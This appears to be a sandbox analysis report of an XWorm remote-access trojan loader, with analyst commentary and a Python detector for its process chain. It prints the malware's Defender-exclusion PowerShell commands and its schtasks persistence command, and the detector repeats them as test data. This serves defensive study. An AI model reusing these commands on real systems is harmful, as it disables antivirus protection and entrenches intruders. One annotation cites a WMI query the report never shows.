Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\coding, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\ProgramData\coding, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\24572628.exe, type: DROPPED | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\Desktop\24572628.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
The Sekoia XWorm v3 rule and the ditekSHen AsyncRAT rule fire on the same unpacked bodies (the dropped 24572628.exe, its persistence copy C:\ProgramData\coding, and the decrypted payload in the loader's memory). The family call is XWorm; the AsyncRAT hit reflects shared code-base overlap, not a second family.
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\24572628.exe | Code function: 3_2_00007FF848A41290
Source: C:\Users\user\Desktop\24572628.exe | Code function: 3_2_00007FF848A46E72
Source: C:\Users\user\Desktop\24572628.exe | Code function: 3_2_00007FF848A41719
Source: C:\Users\user\Desktop\24572628.exe | Code function: 3_2_00007FF848A460C6
Source: C:\Users\user\Desktop\24572628.exe | Code function: 3_2_00007FF848A4108D
Source: C:\Users\user\Desktop\24572628.exe | Code function: 3_2_00007FF848A420F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848B130E7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848B330E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00007FF848B42E11
Source: C:\ProgramData\coding | Code function: 17_2_00007FF848A71719
Source: C:\ProgramData\coding | Code function: 17_2_00007FF848A720F1
Source: C:\ProgramData\coding | Code function: 17_2_00007FF848A71038
Source: C:\ProgramData\coding | Code function: 21_2_00007FF848A31719
Source: C:\ProgramData\coding | Code function: 21_2_00007FF848A320F1
Source: C:\ProgramData\coding | Code function: 21_2_00007FF848A31038
Source: YPzNsfg4nR.exe | Static PE information: No import functions for PE file found
Source: YPzNsfg4nR.exe, 00000000.00000000.2176160386.0000020868AC6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename1fht7W0d34QhN.exe< vs YPzNsfg4nR.exe
Source: YPzNsfg4nR.exe, 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamexingping.exe4 vs YPzNsfg4nR.exe
Source: YPzNsfg4nR.exe, 00000000.00000002.2274202770.0000020868C65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamexiW vs YPzNsfg4nR.exe
Source: YPzNsfg4nR.exe | Binary or memory string: OriginalFilename1fht7W0d34QhN.exe< vs YPzNsfg4nR.exe
The three OriginalFilename values (1fht7W0d34QhN.exe in the loader's own version resource, xingping.exe in the decrypted payload region) are a usable pivot: the submitted file is a loader whose embedded payload was built under a different name.
Source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\coding, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\ProgramData\coding, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\Desktop\24572628.exe, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\Desktop\24572628.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: YPzNsfg4nR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YPzNsfg4nR.exe, Loader.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 24572628.exe.0.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 24572628.exe.0.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 24572628.exe.0.dr, SIIG8lqorRBYoF5JEoCZBv9CuNq.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, OszBM2fJqaqDqfTYb3i92yMDtuZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, OszBM2fJqaqDqfTYb3i92yMDtuZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, SIIG8lqorRBYoF5JEoCZBv9CuNq.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: coding.3.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: coding.3.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: coding.3.dr, SIIG8lqorRBYoF5JEoCZBv9CuNq.cs | Cryptographic APIs: 'TransformFinalBlock'
CreateDecryptor in the loader's Loader.cs and TransformFinalBlock in the dropped client are the .NET SymmetricAlgorithm/ICryptoTransform calls behind the "Sample uses string decryption to hide its real strings" signature. The report does not name the cipher, key derivation or key, so none should be assumed from these lines alone.
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 24572628.exe.0.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 24572628.exe.0.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: coding.3.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: coding.3.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
WindowsIdentity.GetCurrent() followed by WindowsPrincipal.IsInRole(WindowsBuiltInRole) is the standard .NET test for whether the current token holds a built-in role, normally Administrator. It is the natural gate for the elevated persistence path seen below (schtasks /RL HIGHEST only yields a highest-privilege task when the creator is itself elevated).
Source: classification engine | Classification label: mal100.troj.evad.winEXE@24/28@2/3
Source: C:\Users\user\Desktop\YPzNsfg4nR.exe | File created: C:\Users\user\Desktop\xxx.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\ProgramData\coding | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Users\user\Desktop\24572628.exe | Mutant created: \Sessions\1\BaseNamedObjects\HAzSfCvWFIXriVXa
Source: C:\Windows\System32\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
HAzSfCvWFIXriVXa is the only non-system mutex in the list and is the host-based indicator worth keeping; the SM0:<pid>:120:WilError_03 objects are WIL error-reporting mutexes that conhost.exe and OpenWith.exe create on their own.
Source: C:\Users\user\Desktop\24572628.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: YPzNsfg4nR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YPzNsfg4nR.exe | Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Users\user\Desktop\YPzNsfg4nR.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\YPzNsfg4nR.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policy lookup done by the loader on every process start; benign)
Source: YPzNsfg4nR.exe | Virustotal: Detection: 16%
Source: unknown | Process created: C:\Users\user\Desktop\YPzNsfg4nR.exe "C:\Users\user\Desktop\YPzNsfg4nR.exe"
Source: C:\Users\user\Desktop\YPzNsfg4nR.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YPzNsfg4nR.exe | Process created: C:\Users\user\Desktop\24572628.exe "C:\Users\user\Desktop\24572628.exe"
Source: C:\Users\user\Desktop\24572628.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\24572628.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\24572628.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\24572628.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\24572628.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\coding C:\ProgramData\coding
Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown | Process created: C:\ProgramData\coding C:\ProgramData\coding
The chain is: the submitted loader starts the dropped 24572628.exe, which adds four Defender exclusions (its own path and process name, then the persistence copy's path and process name) under -ExecutionPolicy Bypass, and registers a scheduled task "coding" that relaunches C:\ProgramData\coding every minute with the highest run level. The two C:\ProgramData\coding launches with an unknown parent are that task firing; the Task Scheduler service, not 24572628.exe, is the parent, which is why the report cannot attribute them.
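The process chain listed above (24572628.exe spawning four powershell.exe Add-MpPreference exclusions under -ExecutionPolicy Bypass, then schtasks.exe creating the every-minute, highest-run-level "coding" task) is what a detection should key on. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. It runs over constructed process-creation records shaped like Sysmon Event ID 1 (the field names pid/ppid/image/cmd and the PIDs are assumptions; the command lines are the ones the report lists), rebuilds each process's ancestry, and flags exclusion additions that cover the launching process itself, as well as the persistence task.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed records (assumption: Sysmon-like pid/ppid/image/cmd fields, made-up PIDs).
# The command lines reproduce the ones in the report. Not real telemetry.
DROPPER = r"C:\Users\user\Desktop\24572628.exe"
PERSIST = r"C:\ProgramData\coding"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"


def _ps(arg: str) -> str:
    return f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference {arg}'


SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1, "image": r"C:\Users\user\Desktop\YPzNsfg4nR.exe",
     "cmd": r'"C:\Users\user\Desktop\YPzNsfg4nR.exe"'},
    {"pid": 4200, "ppid": 4100, "image": DROPPER, "cmd": f'"{DROPPER}"'},
    {"pid": 4300, "ppid": 4200, "image": PS, "cmd": _ps(f"-ExclusionPath '{DROPPER}'")},
    {"pid": 4400, "ppid": 4200, "image": PS, "cmd": _ps("-ExclusionProcess '24572628.exe'")},
    {"pid": 4500, "ppid": 4200, "image": PS, "cmd": _ps(f"-ExclusionPath '{PERSIST}'")},
    {"pid": 4600, "ppid": 4200, "image": PS, "cmd": _ps("-ExclusionProcess 'coding'")},
    {"pid": 4700, "ppid": 4200, "image": SCHTASKS,
     "cmd": f'"{SCHTASKS}" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "{PERSIST}"'},
    {"pid": 4800, "ppid": 4300, "image": r"C:\Windows\System32\conhost.exe",
     "cmd": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},  # benign noise
]

_TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')
_EXCLUSION = re.compile(r"^-Exclusion(Path|Process|Extension|IpAddress)$", re.I)
_USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")


@dataclass
class Finding:
    kind: str        # defender_exclusion | self_exclusion | schtasks_persistence
    pid: int
    detail: str
    chain: List[str] = field(default_factory=list)  # image paths, root ancestor first


def tokenize(cmd: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring "..." and '...' quoting."""
    toks = _TOKEN.findall(cmd)
    return [t[1:-1] if len(t) >= 2 and t[0] == t[-1] and t[0] in "\"'" else t for t in toks]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, dict], pid: int) -> List[str]:
    """Walk ppid links up to the root; the visited set guards against PID-reuse loops."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def switches(toks: List[str]) -> Dict[str, str]:
    """schtasks-style parsing: '/sw value' -> {'sw': 'value'}, bare '/sw' -> ''."""
    out = {}
    for i, t in enumerate(toks):
        if t.startswith("/"):
            nxt = toks[i + 1] if i + 1 < len(toks) else ""
            out[t[1:].lower()] = "" if nxt.startswith("/") else nxt
    return out


def analyze(events: List[dict]) -> List[Finding]:
    by_pid = {e["pid"]: e for e in events}
    findings: List[Finding] = []
    for ev in events:
        toks = tokenize(ev["cmd"])
        if not toks:
            continue
        exe, chain = basename(toks[0]), ancestry(by_pid, ev["pid"])
        parent, low = by_pid.get(ev["ppid"]), [t.lower() for t in toks]
        if exe == "powershell.exe" and "add-mppreference" in low:
            bypass = "-executionpolicy" in low and low[low.index("-executionpolicy") + 1:][:1] == ["bypass"]
            for i, t in enumerate(toks[:-1]):
                m = _EXCLUSION.match(t)
                if not m:
                    continue
                target = toks[i + 1]
                # An exclusion naming the launching process itself is the giveaway:
                # the target equals the parent's full path or its bare file name.
                own = parent is not None and target.lower() in (parent["image"].lower(), basename(parent["image"]))
                findings.append(Finding("self_exclusion" if own else "defender_exclusion", ev["pid"],
                                        f"{m.group(1)}={target} ExecutionPolicyBypass={bypass}", chain))
        elif exe == "schtasks.exe":
            sw = switches(toks[1:])
            if "create" not in sw:
                continue
            reasons = []
            if sw.get("sc", "").lower() == "minute" and sw.get("mo", "1").isdigit() and int(sw.get("mo", "1")) <= 5:
                reasons.append(f"fires every {sw.get('mo', '1')} minute(s)")
            if sw.get("rl", "").upper() == "HIGHEST":
                reasons.append("/RL HIGHEST")
            if any(p in sw.get("tr", "").lower() for p in _USER_WRITABLE):
                reasons.append(f"action in user-writable path {sw['tr']}")
            if reasons:
                findings.append(Finding("schtasks_persistence", ev["pid"], "; ".join(reasons), chain))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.kind, f.pid, f.detail, " -> ".join(basename(p) for p in f.chain))
```

The self-exclusion rule (an exclusion whose target is the parent process's own path or file name) is the high-confidence signal; a bare Add-MpPreference is also issued by legitimate administration tooling, so the ancestry chain stays in the alert to show that this one descends from an unsigned binary on the user's Desktop. The tokenizer honours both "..." and '...' because Windows command lines mix the two, exactly as the report's entries do.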
Source: C:\Users\user\Desktop\YPzNsfg4nR.exe | Section loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, uxtheme.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\24572628.exe | Section loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, sxs.dll, mpr.dll, scrrun.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, avicap32.dll, msvfw32.dll, winmm.dll
The load order of the dropped client tells the story on its own: wbemcomn.dll for the WMI Win32_VideoController query flagged above, then winhttp.dll, mswsock.dll and dnsapi.dll for the outbound connection, and finally avicap32.dll and msvfw32.dll, the Video for Windows capture libraries, which only a process that intends to grab the webcam needs.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
The mi.dll, miutils.dll, wmidcom.dll and wbemcomn.dll loads are expected here: the Defender cmdlets, Add-MpPreference included, are CDXML wrappers over the Defender WMI provider, so the exclusion is written through WMI rather than by the powershell.exe process touching the registry directly. amsi.dll being present means the command line was submitted to AMSI, which is one reason the operator chose separate short invocations instead of an encoded script.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (second instance) | Section loaded (in order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
